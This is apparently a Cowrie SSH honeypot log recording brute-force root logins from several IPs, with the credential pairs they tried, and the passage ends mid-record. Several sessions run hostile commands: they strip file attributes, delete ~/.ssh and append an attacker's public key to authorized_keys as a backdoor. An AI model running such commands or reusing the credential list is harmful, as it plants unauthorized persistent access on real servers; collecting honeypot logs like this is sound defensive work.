{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.002559Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.120952Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.login.success","username":"root","password":"1!p@ssword","message":"login attempt [root/1!p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.598151Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:59:56.887620Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.888277Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:59:56.889260Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.010060Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:59:57.265198Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.265865Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.387229Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.388160Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41406,"dst_ip":"1.2.3.4","dst_port":22,"session":"106b36dfee8c","protocol":"ssh","message":"New connection: 212.227.235.229:41406 (1.2.3.4:22) [session: 106b36dfee8c]","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.506855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.507688Z","src_ip":"212.227.235.229","session":"106b36dfee8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:59:57.627246Z","src_ip":"212.227.235.229","session":"106b36dfee8c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:59:58.150009Z","src_ip":"212.227.235.229","session":"106b36dfee8c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:59:59.272063Z","src_ip":"212.227.235.229","session":"106b36dfee8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41414,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa98ee288d6","protocol":"ssh","message":"New connection: 212.227.235.229:41414 (1.2.3.4:22) [session: 9fa98ee288d6]","sensor":"my-vps","timestamp":"2025-09-08T14:59:59.393682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:59:59.394462Z","src_ip":"212.227.235.229","session":"9fa98ee288d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:59:59.517002Z","src_ip":"212.227.235.229","session":"9fa98ee288d6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:00:00.046887Z","src_ip":"212.227.235.229","session":"9fa98ee288d6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:00.170830Z","src_ip":"212.227.235.229","session":"f3f56f0036c5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:00.171854Z","src_ip":"212.227.235.229","session":"9fa98ee288d6"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":58302,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4dfb1209459","protocol":"ssh","message":"New connection: 158.51.124.56:58302 (1.2.3.4:22) [session: c4dfb1209459]","sensor":"my-vps","timestamp":"2025-09-08T15:00:23.177406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:00:23.178098Z","src_ip":"158.51.124.56","session":"c4dfb1209459"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:00:23.316778Z","src_ip":"158.51.124.56","session":"c4dfb1209459"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer@123","message":"login attempt [developer/developer@123] failed","sensor":"my-vps","timestamp":"2025-09-08T15:00:23.912284Z","src_ip":"158.51.124.56","session":"c4dfb1209459"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:25.052896Z","src_ip":"158.51.124.56","session":"c4dfb1209459"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:28.216896Z","src_ip":"117.72.74.154","session":"b336f328ea69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57440,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d373fa9a0f9","protocol":"ssh","message":"New connection: 212.227.235.229:57440 (1.2.3.4:22) [session: 8d373fa9a0f9]","sensor":"my-vps","timestamp":"2025-09-08T15:00:40.797506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:00:40.799041Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:00:40.961279Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Qa741852","message":"login attempt [root/Qa741852] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:00:41.644125Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:00:42.016134Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.016989Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.017819Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.179314Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:00:42.514757Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.515423Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.677769Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.678638Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57442,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea659152a1ad","protocol":"ssh","message":"New connection: 212.227.235.229:57442 (1.2.3.4:22) [session: ea659152a1ad]","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.865519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:00:42.866309Z","src_ip":"212.227.235.229","session":"ea659152a1ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:00:43.044969Z","src_ip":"212.227.235.229","session":"ea659152a1ad"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:00:43.781794Z","src_ip":"212.227.235.229","session":"ea659152a1ad"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:44.957906Z","src_ip":"212.227.235.229","session":"ea659152a1ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57444,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1e7fb10fbe3","protocol":"ssh","message":"New connection: 212.227.235.229:57444 (1.2.3.4:22) [session: e1e7fb10fbe3]","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.103799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.104849Z","src_ip":"212.227.235.229","session":"e1e7fb10fbe3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.264531Z","src_ip":"212.227.235.229","session":"e1e7fb10fbe3"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":42000,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a8b632827f0","protocol":"ssh","message":"New connection: 185.255.91.51:42000 (1.2.3.4:22) [session: 3a8b632827f0]","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.739441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.740110Z","src_ip":"185.255.91.51","session":"3a8b632827f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-stric